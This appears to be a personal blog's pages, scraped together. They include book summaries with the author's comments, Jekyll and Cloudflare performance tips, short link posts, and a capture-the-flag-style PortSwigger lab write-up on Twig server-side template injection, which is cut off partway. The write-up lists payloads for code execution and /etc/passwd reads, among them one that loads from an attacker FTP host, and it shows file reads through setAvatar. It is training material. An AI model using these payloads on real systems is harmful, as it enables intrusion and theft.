Amazon Description

In this eye-opening account, Cal Newport debunks the long-held belief that “follow your passion” is good advice. Not only is the cliché flawed-preexisting passions are rare and have little to do with how most people end up loving their work-but it can also be dangerous, leading to anxiety and chronic job hopping.

After making his case against passion, Newport sets out on a quest to discover the reality of how people end up loving what they do. Spending time with organic farmers, venture capitalists, screenwriters, freelance computer programmers, and others who admitted to deriving great satisfaction from their work, Newport uncovers the strategies they used and the pitfalls they avoided in developing their compelling careers.

Matching your job to a preexisting passion does not matter, he reveals. Passion comes after you put in the hard work to become excellent at something valuable, not before. In other words, what you do for a living is much less important than how you do it.

With a title taken from the comedian Steve Martin, who once said his advice for aspiring entertainers was to “be so good they can’t ignore you,” Cal Newport’s clearly written manifesto is mandatory reading for anyone fretting about what to do with their life, or frustrated by their current job situation and eager to find a fresh new way to take control of their livelihood. He provides an evidence-based blueprint for creating work you love.

SO GOOD THEY CAN’T IGNORE YOU will change the way we think about our careers, happiness, and the crafting of a remarkable life.

Editorial Reviews

Review

“Stop worrying about what you feel like doing (and what the world owes you) and instead, start creating something meaningful and then give it to the world. Cal really delivers with this one.”

–Seth Godin, author, Linchpin

“Entrepreneurial professionals must develop a competitive advantage by building valuable skills. This book offers advice based on research and reality–not meaningless platitudes– on how to invest in yourself in order to stand out from the crowd. An important guide to starting up a remarkable career.”

–Reid Hoffman, co-founder & chairman of LinkedIn and co-author of the bestselling The Start-Up of You: Adapt to the Future, Invest in Yourself, and Transform Your Career

“Do what you love and the money will follow’ sounds like great advice – until it’s time to get a job and disillusionment quickly sets in. Cal Newport ably demonstrates how the quest for ‘passion’ can corrode job satisfaction. If all he accomplished with this book was to turn conventional wisdom on its head, that would be interesting enough. But he goes further – offering advice and examples that will help you bypass the disillusionment and get right to work building skills that matter.”

–Daniel H. Pink, bestselling author of Drive and A Whole New Mind

“This book changed my mind. It has moved me from ‘find your passion, so that you can be useful’ to ‘be useful so that you can find your passion.’ That is a big flip, but it’s more honest, and that is why I am giving each of my three young adult children a copy of this unorthodox guide.”

–Kevin Kelly, Senior Maverick, WIRED magazine

“First book in years I read twice, to make sure I got it. Brilliant counter-intuitive career insights. Powerful new ideas that have already changed the way I think of my own career, and the advice I give others.”

–Derek Sivers, founder, CD Baby

“Written in an optimistic and accessible tone, with clear logic and no-nonsense advice, this work is useful reading for anyone new to the job market and striving to find a path or for those who have been struggling to find meaning in their current careers.”

–Publishers Weekly

Book Details

Author: Cal Newport

Category: Career Advancement & Professional Development, Job Hunting (Books), Success Self-Help

Publisher: Grand Central Publishing (September 18, 2012)

Paperback: 304 pages

My Comment

Not as strong as Cal Newport’s Deep Work, this book lacks solid evidence for some of its claims, and certain conclusions are drawn from only a small number of people he studied. Nevertheless, it still contains valuable insights that can be life-changing, especially if read at a younger age. Overall, it remains an important and worthwhile read.

References

These are some tips to improve your website, examples are for Jekyll as my website is based on it but the main tips are technology agnostic.

1) Use Cloudflare

• Enable all useful page speed and performance options in Cloudflare panel

  Speed -> Settings: (In the Site Recommendations section): Enable/Disable according to the picture:

  
  

  

  
  

  Enable: HTTP/2, HTTP/3, HTTP/2 to Origin, Always use HTTPS, TLS 1.3, Early Hints

  Disable: All the rest, including 0-RTT Connection Resumption (this option can speed up the connection but it also makes it less secure by providing grounds for replay attacks so we disable it).

• Less noticed but still very important: Enable TLS 1.2 in addition to TLS 1.3

  I was able to retrieve my website feeds again in Newsflow and some other RSS feeds clients after enabling TLS 1.2 again, these clients don’t show any errors but still don’t load your feeds if you enable only TLS 1.3.

  Use this setting in Cloudflare, SSL/TLS -> Edge Certificates:

  Minimum TLS version: TLS 1.2

  
  

  

  
  

  How I found it was TLS issue? I used RSS Validator for checking the validity of my website RSS feed after some changes and it returned TLS error, so I got suspicious that it might be due to only TLS 1.3 being enabled and I tested after enabling TLS 1.2 and voila! My RSS feed clients started working again!

• Use Cloudflare’s Email Address Obfuscation

  Use it for your email address but use it only on one Contact page:

  Remove email address from website footer and only use it in a Contact page to limit the overhead of Cloudflare JS used for email address obfuscation to only one page.

  A more solid solution is to use a local JS for email address obfuscation, the local solution can be more complicated but still suffers from lack of randomization. The Cloudflare email obfuscation solution is good enough, enable it if you haven’t already.

  To enable Cloudflare email obfuscation:

  Scrape Shield -> Email Address Obfuscation

  While there you can also enable Hotlink Protection.

  
  

  

  
  

There are many more Cloudflare features that can help us run a more fast, optimized and secure website. I may write a post in the future dedicated to the most useful Cloudflare settings for websites.

2) Reduce Cumulative Layout Shift(CLS)

• Use hardcoded width and height for img and video tags

• Use a CSS class to still support responsive after previous tip

  This is the way I handle it in my Jekyll website, in base.scss file:

  // Fix Layout Shift issue(combined with adding width and height to html img and video tags)
  img, video {
    max-width: 100%;  /* makes it responsive */
    height: auto;     /* keeps aspect ratio */
    display: block;   /* avoids inline spacing issues */
  }
  
  img.no-responsive, video.no-responsive {
    max-width: none;
    height: auto;
    display: inline;
  }
  

3) Reduce Largest Contentful Paint(LCP)

• Use more modern media formats

  Use AVIF,WebP image formats instead of PNG or JPG and MP4,WebM video formats instead of heavy GIF files to significantly improve load speed and decrease file sizes.

  You can use FFmpeg, cwebp and ImageMagick to convert PNG/JPG to more modern and web-friendly AVIF/WebP formats.

  You can also use FFmpeg to resize MP4 files or convert them to WebM format.

  Here is some example commands I use for image conversion that I’ve found to return desirable results for me in most cases:

  # for images
  ## mainly used
  ### convert png/jpg to webp/avif:
  cwebp -q 90 -near_lossless 95 -m 6 test.png -o test.webp
  magick test.png -quality 80 test.avif
  ### resize png/jpg, keep aspect ratio(example: use 130x for width: 130, use x130 for height: 130 ):
  magick why-we-sleep-book.jpg -resize 130x why-we-sleep-book-thumb.jpg
  
  ## some other variations that had good results for me
  ffmpeg -i test.png -c:v libaom-av1 -crf 20 -b:v 0 test.avif
  ffmpeg -i test.png -q:v 80 test.webp
  ffmpeg -i test.png -c:v libaom-av1 -crf 30 -b:v 0 test.avif
  
  # for videos
  ## resize video files
  ffmpeg -i test.mp4 -vf scale=256:256 test_resized.mp4
  ffmpeg -i test.mp4 -vf scale=308:462 -c:v libx264 -crf 32 -preset veryslow -an test_resized.mp4
  
  ## convert to webm
  ffmpeg -i test.mp4 -c:v libaom-av1 -crf 40 -b:v 0 -an test.webm
  
  ffmpeg -i test.mp4 -c:v libaom-av1 -crf 30 -b:v 0 -pass 1 -an -f null -y /dev/null
  ffmpeg -i test.mp4 -c:v libaom-av1 -crf 30 -b:v 0 -pass 2 -an test.webm
  

  In the case of AVIF and WebP use, 96-97% of viewers are supported, for those with older legacy browsers or devices, fallback to original PNG or JPG formats.

  I’ve written a Ruby plugin for my website to do just that and added more arguments for more control. It’s open-sourced, you can see my whole website in GitHub.

• Use fetchpriority="high"

  Use it for your largest contentful paint (LCP) image or video that is immediately visible above the fold.

• Use loading attribute for img tag

  loading="lazy": Great for images below the fold, but never on your LCP image (causes delays).

  Rule of thumb:

  • Above the fold: loading="eager" (or omit, since eager is default).
  • Below the fold: loading="lazy".

• Use decoding="async" for secondary images

  Usually improves main-thread responsiveness.

  For the LCP image, async decoding can slightly delay the first paint.

  Minimal risk overall, safe for secondary images.

• Preload LCP image via <link rel="preload">

  Jekyll Example: This is how I use Preload for my hero poster images(hero images that are loaded before video content is fully downloaded) in the head.html file of my Jekyll website:

  {% if page.hero-poster %}<link rel="preload" as="image" href="{{ page.hero-poster }}" fetchpriority="high">{% endif %}
  

  and use hero-poster variable in the frontmatter and body of the pages that I want to use hero poster image on:

  ---
  layout: page
  title: Blog
  image: /blog/assets/robot1.png
  description: "Here I talk about anything, mostly technical topics."
  hero-poster: /blog/assets/robot1.avif
  ---
  
  <video autoplay muted loop playsinline width="308" height="462" poster="{{ page.hero-poster }}">
    <source src="/blog/assets/robot1.webm" type="video/webm">
    <source src="/blog/assets/robot1.mp4" type="video/mp4">
  </video>
  

  
  

• Rule of thumb for safe optimization

  LCP/hero image: preload + fetchpriority=”high” + eager (no async).

  Other above-the-fold: optional async decoding, no lazy.

  Below-the-fold: lazy + async decoding.

  Don’t mark too many resources as high priority.

  Keep image sizes reasonable.

• Use explicit width & height for images

  we already did that for reducing Cumulative Layout Shift in tip number 2.

4) Optimize CSS

• Compress the CSS file and disable source maps

  Example: in a Jekyll website, in _config.yaml:

  sass:
    style: compressed
    sourcemap: never
  

  style: compressed: minifies your CSS (removes whitespace, comments, etc.).

  sourcemap: never: stops Jekyll from generating main.css.map and removes the reference.

  Result:

  • You’ll only get a small, minified main.css.

  • No .map file.

  • Leanest possible setup for GitHub Pages.

  • The result is a tiny, production-ready main.css that PageSpeed Insights sees as fully optimized.

• Use PurgeCSS post-build to remove CSS codes that are not used

  If you build your website locally, create a workflow to run PurgeCSS after your website build to remove unused parts of your CSS file.

• Inline critical CSS

  Use a tool like Critical CSS, Penthouse, Critters or Crittr to extract critical parts of CSS that are used for above the fold content of each of your important HTML pages and inline those parts of CSS for faster page loads. Use nonce for inline styles.

5) Minify JS scripts

Minify inline and external JS scripts with a tool like Terser. Also use nonce for inline scripts.

6) Some other tips

• Load resources locally

  If you use some website profile badges on your website (like the TryHackMe and HackTheBox badges on my website footer), it’s better to download the image and serve it from your own website resources instead of direct requests for them. So that you can optimize these pictures and use smaller and more modern image formats and also prevent additional requests and cookies of third party services you send requests to.

  Another benefit is you don’t need to add additional CSP rules for external resources of your website.

  Example: I’ve added an option in my _config.yml file that gives me the option to choose to serve those pictures locally or from upstream servers:

  badges:
    hackthebox: "768488"
    selfhost_hackthebox: true
    tryhackme: "nima"
    selfhost_tryhackme: true
  

  also in footer.html:

    {% if site.badges.hackthebox %}
      <li class="social-media-list">
        {% if site.badges.selfhost_hackthebox %}
          <!-- local HTB badge -->
          <a title="Hack The Box Profile" href="https://app.hackthebox.com/profile/{{ site.badges.hackthebox }}">
            {% smart_image "/assets/{{ site.badges.hackthebox }}.png" 220 50 "Hack The Box Profile" lazy "" avif async "no-responsive" %}
          </a>
        {% else %}
          <!-- upstream HTB badge -->
          <a title="Hack The Box Profile" href="https://app.hackthebox.com/profile/{{ site.badges.hackthebox }}">
            <img src="https://www.hackthebox.eu/badge/image/{{ site.badges.hackthebox }}" width="220" height="50" loading="lazy" decoding="async" alt="Hack The Box" class="no-responsive">
          </a>
        {% endif %}
      </li>
    {% endif %}
  
    {% if site.badges.tryhackme %}
      <li class="social-media-list">
        {% if site.badges.selfhost_tryhackme %}
          <!-- local TryHackMe badge -->
          <a title="TryHackMe Profile" href="https://tryhackme.com/p/{{ site.badges.tryhackme }}">
            {% smart_image "/assets/{{ site.badges.tryhackme }}.png" 329 88 "TryHackMe Profile" lazy "" avif async "no-responsive" %}
          </a>
        {% else %}
          <!-- upstream TryHackMe badge -->
          <a title="TryHackMe Profile" href="https://tryhackme.com/p/{{ site.badges.tryhackme }}">
            <img src="https://tryhackme-badges.s3.amazonaws.com/{{ site.badges.tryhackme }}.png" width="329" height="88" loading="lazy" decoding="async" alt="TryHackMe Profile" class="no-responsive">
          </a>
        {% endif %}
      </li>
    {% endif %}
  

• Create clean workflows for website build and publish

  You can have two branches, one for website build and another for publish.

  Example: I use main branch for build and gh-pages for publish.

  Here is my local build pipeline for main branch , fully automated:

  npm run build
  

  here’s the code for package.json:

  {
    "name": "nima.ninja",
    "version": "1.0.0",
    "type": "module",
    "scripts": {
      "update:badges": "node build/update-badges.js",
  
      "build:jekyll:1": "bundle exec jekyll build",
  
      "postcss": "postcss \"_site/css/main.css\" -o \"_site/css/main.css\"",
  
      "copy:minified-css": "node build/copy-file.js \"_site/css/main.css\" \"src/css/temp.main.css\"",
  
      "postcss:critical": "postcss \"_site/css/main.css\" -o \"_site/css/main-critical.css\" --env critical",
  
      "critical:home:mobile": "critical _site/index.html --base=_site --css=_site/css/main-critical.css --width=412 --height=667 > src/_includes/critical-home-mobile.css || echo 'Skipped home mobile critical'",
      "critical:home:tablet": "critical _site/index.html --base=_site --css=_site/css/main-critical.css --width=768 --height=800 > src/_includes/critical-home-tablet.css || echo 'Skipped home tablet critical'",
      "critical:home:desktop": "critical _site/index.html --base=_site --css=_site/css/main-critical.css --width=1440 --height=800 > src/_includes/critical-home-desktop.css || echo 'Skipped home desktop critical'",
  
      "critical:post:mobile": "critical _site/blog/2025/quick-tips-for-a-better-website.html --base=_site --css=_site/css/main-critical.css --width=412 --height=667 > src/_includes/critical-post-mobile.css || echo 'Skipped post mobile critical'",
      "critical:post:tablet": "critical _site/blog/2025/quick-tips-for-a-better-website.html --base=_site --css=_site/css/main-critical.css --width=768 --height=800 > src/_includes/critical-post-tablet.css || echo 'Skipped post tablet critical'",
      "critical:post:desktop": "critical _site/blog/2025/quick-tips-for-a-better-website.html --base=_site --css=_site/css/main-critical.css --width=1440 --height=800 > src/_includes/critical-post-desktop.css || echo 'Skipped post desktop critical'",
  
      "critical:page:mobile": "critical _site/books/index.html --base=_site --css=_site/css/main-critical.css --width=412 --height=667 > src/_includes/critical-page-mobile.css || echo 'Skipped page mobile critical'",
      "critical:page:tablet": "critical _site/books/index.html --base=_site --css=_site/css/main-critical.css --width=768 --height=800 > src/_includes/critical-page-tablet.css || echo 'Skipped page tablet critical'",
      "critical:page:desktop": "critical _site/books/index.html --base=_site --css=_site/css/main-critical.css --width=1440 --height=800 > src/_includes/critical-page-desktop.css || echo 'Skipped page desktop critical'",
  
      "critical:home": "npm run critical:home:mobile && npm run critical:home:tablet && npm run critical:home:desktop",
      "critical:post": "npm run critical:post:mobile && npm run critical:post:tablet && npm run critical:post:desktop",
      "critical:page": "npm run critical:page:mobile && npm run critical:page:tablet && npm run critical:page:desktop",
      "critical": "npm run critical:home && npm run critical:post && npm run critical:page",
  
      "minify:inlinejs": "terser \"src/_includes/lazy-load-back-to-top.js\" -o \"src/_includes/lazy-load-back-to-top.min.js\" -c -m",
  
      "build:jekyll:2": "bundle exec jekyll build",
  
      "minify:js": "terser \"_site/js/back-to-top.js\" -o \"_site/js/back-to-top.js\" -c -m && terser \"_site/js/particles.js\" -o \"_site/js/particles.js\" -c -m && terser \"_site/js/smooth-fragments.js\" -o \"_site/js/smooth-fragments.js\" -c -m",
  
      "copy:back": "node build/copy-file.js \"src/css/temp.main.css\" \"_site/css/main.css\"",
  
      "copy:root-files": "node build/copy-file.js src/README.md README.md && node build/copy-file.js src/license.md license.md",
  
      "build": "npm run update:badges && npm run build:jekyll:1 && npm run postcss && npm run copy:minified-css && npm run postcss:critical && npm run critical && npm run minify:inlinejs && npm run build:jekyll:2 && npm run minify:js && npm run copy:back && npm run copy:root-files"
    },
    "scriptsComments": {
      "update:badges": "Generate README.md from README.template.md by replacing placeholders ({{LAST_UPDATED}}, {{RUBY_VERSION}}, {{JEKYLL_VERSION}}, {{NODE_VERSION}}, {{NPM_VERSION}}) with real values. Do not edit README.md directly — edit README.template.md instead.",
      "build:jekyll:1": "First Jekyll build: generate HTML pages.",
      "postcss": "Run PostCSS with PurgeCSS to remove unused CSS for live site.",
      "copy:minified-css": "Save a temp copy of main.css so it can be restored later.",
      "postcss:critical": "Run PostCSS again to generate main-critical.css, removing selectors that should not be inlined by Critical (like #toTopButton).",
      "critical:*": "Generate critical CSS for different breakpoints and pages, reading main-critical.css.",
      "minify:inlinejs": "Minify inline JS scripts",
      "build:jekyll:2": "Second Jekyll build: inject generated Critical CSS includes and generated inline JS scripts includes into HTML pages.",
      "minify:js": "Minify JS files.",
      "copy:back": "Restore the full PurgeCSS main.css to _site for live site.",
      "copy:root-files": "Copy README.md and license.md from src/ to repository root so they exist at the repo root for GitHub display and are not only in _site",
      "build": "Full build pipeline: update badges, build site, process CSS, generate Critical CSS, rebuild HTML with critical CSS and minified inline scripts, minify JS files, restore main CSS."
    },
    "devDependencies": {
      "@fullhuman/postcss-purgecss": "7.0.2",
      "critical": "7.2.1",
      "postcss": "8.5.6",
      "postcss-cli": "11.0.1",
      "terser": "5.44.0"
    }
  }
  

  The script comments are clear about each of those build lines.

  Codes for all of these files exist in my website GitHub repo.

  For gh-pages branch which is used for publishing website files for GitHub Pages:

  # Switch to gh-pages branch
  git checkout gh-pages
  
  # Ensure .gitignore contains only:
  # _site/, CNAME, node_modules/, .jekyll-cache/
  git add .gitignore
  git commit -m "Fix .gitignore for gh-pages"
  
  # Clean branch root while keeping .git, .gitignore, node_modules and _site
  Get-ChildItem -Force | Where-Object {
      $_.Name -notin @('.git', '.gitignore', 'node_modules', '_site')
  } | Remove-Item -Recurse -Force
  
  # Optional: Remove temporary Jekyll cache if exists
  if (Test-Path ".jekyll-cache") { Remove-Item -Recurse -Force .jekyll-cache }
  
  # Copy freshly built _site contents into repo root
  robocopy "_site" "." /E
  
  # Stage all changes
  git add .
  
  # Optional: Show staged changes
  git status
  
  # Commit & push automatically if there are changes
  if (-not (git diff --cached --quiet)) {
      git commit -m "Update site from _site"
      git push origin gh-pages
  } else {
      Write-Output "No changes to commit. Nothing to push."
  }
  

  The result: built website code is committed and pushed to the gh-pages branch of my website on GitHub.

References

My first post after a long time, although it seems like a purely fun post, it’s got a powerful psychological message:

Don’t talk about your goals and what you’re doing unless they’re already done.

You lose the motivation and mental energy necessary to achieve your goals if you talk about them prematurely. There are already some credible researches done about this subject.

It comes from research in social psychology:

When you talk about a goal, your brain gets a premature reward signal. People praise you, or you feel proud just by saying it. That dopamine hit tricks your mind into thinking you’ve already made progress.

As a result, motivation drops, because the urge to prove yourself through action is partially satisfied by words alone.

This is why many successful people keep their plans quiet until they’re done — it protects their mental energy.

Also there are other reasons for not talking about your goals but this one is the most important.

You can follow the “Mindset Machine” page on X for more high quality motivational/inspirational posts.

External Links

• Mindset Machine on X

References

Amazon Description

“Read this book, strengthen your resolve, and help us all return to reason.” —JORDAN PETERSON

USA TODAY NATIONAL BESTSELLER

There’s a war against truth… and if we don’t win it, intellectual freedom will be a casualty.

The West’s commitment to freedom, reason, and true liberalism has never been more seriously threatened than it is today by the stifling forces of political correctness.

Dr. Gad Saad, the host of the enormously popular YouTube show THE SAAD TRUTH, exposes the bad ideas—what he calls “idea pathogens”—that are killing common sense and rational debate. Incubated in our universities and spread through the tyranny of political correctness, these ideas are endangering our most basic freedoms—including freedom of thought and speech.

The danger is grave, but as Dr. Saad shows, politically correct dogma is riddled with logical fallacies. We have powerful weapons to fight back with—if we have the courage to use them.

A provocative guide to defending reason and intellectual freedom and a battle cry for the preservation of our fundamental rights, The Parasitic Mind will be the most controversial and talked-about book of the year.

About the Author

Dr. Gad Saad is Professor of Marketing at Concordia University (Montreal, Canada), and former holder of the Concordia University Research Chair in Evolutionary Behavioral Sciences and Darwinian Consumption (2008-2018). He has held Visiting Associate Professorships at Cornell University, Dartmouth College, and the University of California–Irvine. Dr. Saad received the Faculty of Commerce’s Distinguished Teaching Award in June 2000, and was listed as one of the ‘hot’ professors of Concordia University in both the 2001 and 2002 Maclean’s reports on Canadian universities. Saad was appointed Newsmaker of the Week of Concordia University in five consecutive years (2011-2015), and is the co-recipient of the 2015 President’s Media Outreach Award-Research Communicator of the Year (International), which goes to the professor at Concordia University whose research receives the greatest amount of global media coverage.

Professor Saad has pioneered the use of evolutionary psychology in marketing and consumer behavior. His works include The Consuming Instinct: What Juicy Burgers, Ferraris, Pornography, and Gift Giving Reveal About Human Nature (translated into Korean and Turkish); The Evolutionary Bases of Consumption; Evolutionary Psychology in the Business Sciences, along with 75+ scientific papers, many at the intersection of evolutionary psychology and a broad range of disciplines including consumer behavior, marketing, advertising, psychology, medicine, and economics. His Psychology Today blog (Homo Consumericus) and YouTube channel (THE SAAD TRUTH) have garnered 6.4+ million and 20.8+ million total views respectively. He recently started a podcast titled The Saad Truth with Dr. Saad, which is available on all leading podcast platforms.

In addition to his scientific work, Dr. Saad is a leading public intellectual who often writes and speaks about idea pathogens that are destroying logic, science, reason, and common sense. His fourth book The Parasitic Mind: How Infectious Ideas Are Killing Common Sense will be released on October 6, 2020.

He received a B.Sc. (1988) and an M.B.A. (1990) both from McGill University, and his M.S. (1993) and Ph.D. (1994) from Cornell University.

Book Details

Author: Gad Saad

Category: Civil Rights & Liberties, Political Commentary & Opinion, Political Conservatism & Liberalism

Publisher: Regnery Publishing (October 5, 2021)

Paperback: 264 pages

My Comment

I think this is a necessary read to become more familiar and immune to some dangerous mind viruses that threaten the very fabric of the free world that we have taken for granted.

Also praised and recommended by Elon Musk on X.

References

Amazon Description

For David Goggins, childhood was a nightmare – poverty, prejudice, and physical abuse colored his days and haunted his nights. But through self-discipline, mental toughness, and hard work, Goggins transformed himself from a depressed, overweight young man with no future into a U.S. Armed Forces icon and one of the world’s top endurance athletes. The only man in history to complete elite training as a Navy SEAL, Army Ranger, and Air Force Tactical Air Controller, he went on to set records in numerous endurance events, inspiring Outside magazine to name him “The Fittest (Real) Man in America.”

In Can’t Hurt Me, he shares his astonishing life story and reveals that most of us tap into only 40% of our capabilities. Goggins calls this The 40% Rule, and his story illuminates a path that anyone can follow to push past pain, demolish fear, and reach their full potential.

Editorial Reviews

Review

“David Goggins is a being of pure will and inspiration. Just listening to this guy talk makes you want to run up a mountain. I firmly believe people like him can change the course of the world just by inspiring us to push harder and dig deeper in everything we do. His goal to be ‘uncommon amongst uncommon people’ is something we can all use to propel ourselves to fulfill our true potential. I’m a better man having met him.” –Joe Rogan, Standup Comedian and Host of the Joe Rogan Experience Podcast

“David Goggins lives out every goal, every dream no matter what. PERIOD. He’s unstoppable. There’s no limit to him because he doesn’t live in a comfort zone. His mental and physical capacity are equal. Goggins proves that your body can handle anything if you let your mind keep up. There’s no way to stop something or someone that doesn’t understand the concept of being beat.” –Marcus Luttrell, Retired Navy SEAL, Author of New York Times Best Seller Lone Survivor

“Modern neuroscience is teaching us that the path to courage and success arrives through embracing pain and fear, not by avoiding them. If ever there was a real-life example of this, it is the story of David Goggins. In his unrelenting pursuit to self-conquer, Goggins taught himself how to tap into that elusive holy grail of human existence: the ability to rewire one’s own brain in order to continually do better and actually become better, regardless of feelings, external conditions, or motivational state. Can’t Hurt Me is the remarkable description of that journey and the capacity to leverage and better the mind. More importantly, it also teaches you how.” –Andrew D. Huberman, PhD, Professor of Neurobiology, Stanford University School of Medicine

“David Goggins throws the door open on pain, evil, darkness, the worst and yes, the best of humanity, and the strength of the human soul…and that’s just in chapter one. If you are looking for a book that will heal, stretch, inspire, and dig into the corners of what it takes to persevere and overcome in a messed-up world, this is your book.” –Taya Kyle, Widow of American Sniper Chris Kyle, Author of New York Times Best Seller American Wife

“By the time you finish David Goggins’s new book, you’ll have kicked your victim mentality in the butt. Where you go from there is entirely up to you–as Goggins makes clear in this entertaining and poignant memoir cum inspirational how-to. As the man with a hole in his heart tells you, there are no excuses in life, only reasons to try harder.” –Jim DeFelice, Author of American Sniper

“David Goggins’s book is not the first about overcoming severe hardships to achieve success, but it is certainly one of the most compelling. His story of beating the odds, of achieving athletic greatness, of serving his country and his charities, and of mastering his own destiny will inspire all of us to reach a little higher and give a little more. ‘I will never quit’ is a tenet of the Navy SEAL ethos, and one that David Goggins applies to everything he does.” –Admiral Eric Olson, U.S. Navy (Retired); Former Commander, United States Special Operations Command; Chairman, Special Operations Warrior Foundation

“I’m inspired that people like this guy exist. Not everyone will live a life like David Goggins, but he is proof that anyone could if given the right headspace within.” –Kelly Slater, Eleven-Time World Champion Surfer

“Guaranteed to galvanize more than a few couch potatoes into action.” – Kirkus Reviews

About the Author

David Goggins is a retired Navy SEAL and the only member of the U.S. Armed Forces ever to complete SEAL training, U.S. Army Ranger School, and Air Force Tactical Air Controller training. Goggins has competed in more than sixty ultra-marathons, triathlons, and ultra-triathlons, setting new course records and regularly placing in the top five. A former Guinness World Record holder for completing 4,030 pull-ups in seventeen hours, he’s a much-sought-after public speaker who’s shared his story with the staffs of Fortune 500 companies, professional sports teams, and hundreds of thousands of students across the country.

Book Details

Author: David Goggins

Category: Personal Transformation Self-Help, Success Self-Help, Motivational Self-Help

Publisher: Lioncrest Publishing; Illustrated edition (December 10, 2018)

Paperback: 364 pages

My Comment

This is a great motivational book that shows we have far more mental and physical capacities than we usually feel and we can achieve far greater goals if we try harder than usual, written by a man who has lived what he’s talking about.

The 40% percent rule mentioned in the book is eye-opening, that most of us usually tap into only 40 percent of our capabilities and this is the point our body and mind tell us it’s enough and we need to stop, but we can surpass this point and achieve far greater outcomes if we have trained our mind good enough.

Goggins makes us more familiar with our powerful mind and body with his real-life experiences and stories that are beyond what most of us think are humanly possible yet almost all of us can achieve.

References

This course is a gold mine for every web application security enthusiast.

External Links

• Stanford CS 253 Web Security

References

Nice sample prompts that will give you some ideas on how to use ChatGPT more effectively for Bug Hunting.

External Links

• ChatGPT for Bug Bounty: Faster Hunting and Reporting

References

A valuable guide for beginners on how to get prepared for the OSCP certification exam.

External Links

• Beginner’s Guide To OSCP 2023

References

Lab Link

Lab: Server-side template injection with a custom exploit

Lab Description

This lab is vulnerable to server-side template injection. To solve the lab, create a custom exploit to delete the file /.ssh/id_rsa from Carlos’s home directory.

You can log in to your own account using the following credentials: wiener:peter

Warning

As with many high-severity vulnerabilities, experimenting with server-side template injection can be dangerous. If you’re not careful when invoking methods, it is possible to damage your instance of the lab, which could make it unsolvable. If this happens, you will need to wait 20 minutes until your lab session resets.

Solutions

Solution 1: My Solution

This lab was pretty cool, I really enjoyed it, It took me a few days to solve this lab because at first I was going to the wrong direction reading all the stuff in Twig documentation which was unnecessary for this lab. Because in order to exploit most templating engines, you need to read the documentation and find important tips about security issues, warnings, plugins and extensions, FAQ, how to upload custom templates, developer section, how to create custom gadget chains, chaining suitable objects until we can get a useful method which leads to RCE or file read which could cause sensitive information disclosure… all of which can become pretty time-consuming.

I tried to create custom Twig templates, Twig extensions and Twig filters and upload them to the server with the avatar image upload functionality and then run them where I had found template injection, I tried to create custom PHP files, and run them, none of these methods worked because Twig is already a quite hardened templating engine, so I realized I need another approach.

I also pressed ChatGPT very hard asking all kinds of questions about Twig documentation and the syntax on how to create new Twig filters, extensions…

But the answer was simpler than I thought first, it just needed complete attention to the part of Web Security Academy before the lab, actually the description there had the answer in it:

Some template engines run in a secure, locked-down environment by default in order to mitigate the associated risks as much as possible. Although this makes it difficult to exploit such templates for remote code execution, developer-created objects that are exposed to the template can offer a further, less battle-hardened attack surface.

However, while substantial documentation is usually provided for template built-ins, site-specific objects are almost certainly not documented at all. Therefore, working out how to exploit them will require you to investigate the website’s behavior manually to identify the attack surface and construct your own custom exploit accordingly.

So we should search for developer-created objects, this is tip #1.

Ok, we run the lab, Open Burp Suite and proxy the traffic, log in as the wiener user, in the account page, there are two other tips:

2. We can choose the “Preferred name”:

for example we can choose “First Name”, check Burp and see the request POST /my-account/change-blog-post-author-display is sent and some part of body is: blog-post-author-display=user.first_name.

Also post a comment in one of the posts on the website and see that our account’s first name, Peter, is shown as the comment post:

So our “Preferred name” is reflected in comment post section, we can test if this is vulnerable to template injection:

Send that previous POST /my-account/change-blog-post-author-display request to Burp repeater and change the blog-post-author-display in the message body like the following to test for temlpate injection:

      blog-post-author-display=user.first_name${{<%[%'"}}

    

And send the request, then refresh the post page that we had commented on, now this error is shown:

Which is quite useful. It shows we are dealing with Twig Template. We can now use some Twig syntax to see if there is template Injection:

      blog-post-author-display=user.first_name}}{{7*7

    

Then we can see, the result is reflected in our first name in the comments:

So we have template injection, but can we exploit it?

We search for some common Twig payloads and test them in the above section:

      {{dump(app)}}
{{app.request.server.all|join(',')}}

#File read
"{{'/etc/passwd'|file_excerpt(1,30)}}"@
{{include("wp-config.php")}}

#Exec code
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("whoami")}}
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("id;uname -a;hostname")}}
{{['id']|filter('system')}}
{{['cat\x20/etc/passwd']|filter('system')}}
{{['cat$IFS/etc/passwd']|filter('system')}}

    

and see none of them actually work, so we still have a template injection that we may be able to use later, so let’s move on:

3. We also see that we can upload our avatar image here:

First, we upload an actual image and check the request/response, no useful info is found, then let’s see what happens if we don’t select any file and click upload, as we can see we get an error:

Let’s play with this again, this time we try to see if we can upload a PHP file, then click upload, once again we get another error message:

This error is pretty useful, it shows two PHP files and also a user.setAvatar() method, so this user object that we also saw in tip #2 might be the developer-created object mentioned in our tip #1 and we might somehow be able to use its setAvatar method, let’s test it in POST /my-account/change-blog-post-author-display first:

      blog-post-author-display=user.setAvatar()

    

Now send the request and refresh the post page we had commented on to see the result, We get this error:

Very good! It shows this method can be used, now let’s see if we can read those two PHP files found in the file upload errors, also notice in that image that setAvatar() method needs two arguments, first is the file path the second is MIME type, so first let’s try /home/carlos/User.php:

      blog-post-author-display=user.setAvatar('/home/carlos/User.php','application/octet')

    

Send the request, refresh the post page, Now we get this error:

Notice that it needs an image MIME type, so we change the payload like this:

      blog-post-author-display=user.setAvatar('/home/carlos/User.php','image/jpeg')

    

Send this request, refresh the post page, now something interesting happens:

It seems our avatar image is successfully set to this PHP file, so we might be able to download and read this file. Now right click on this image and select “Open image in new tab” now the User.php file is downloaded:

      <?php

class User {
    public $username;
    public $name;
    public $first_name;
    public $nickname;
    public $user_dir;

    public function __construct($username, $name, $first_name, $nickname) {
        $this->username = $username;
        $this->name = $name;
        $this->first_name = $first_name;
        $this->nickname = $nickname;
        $this->user_dir = "users/" . $this->username;
        $this->avatarLink = $this->user_dir . "/avatar";

        if (!file_exists($this->user_dir)) {
            if (!mkdir($this->user_dir, 0755, true))
            {
                throw new Exception("Could not mkdir users/" . $this->username);
            }
        }
    }

    public function setAvatar($filename, $mimetype) {
        if (strpos($mimetype, "image/") !== 0) {
            throw new Exception("Uploaded file mime type is not an image: " . $mimetype);
        }

        if (is_link($this->avatarLink)) {
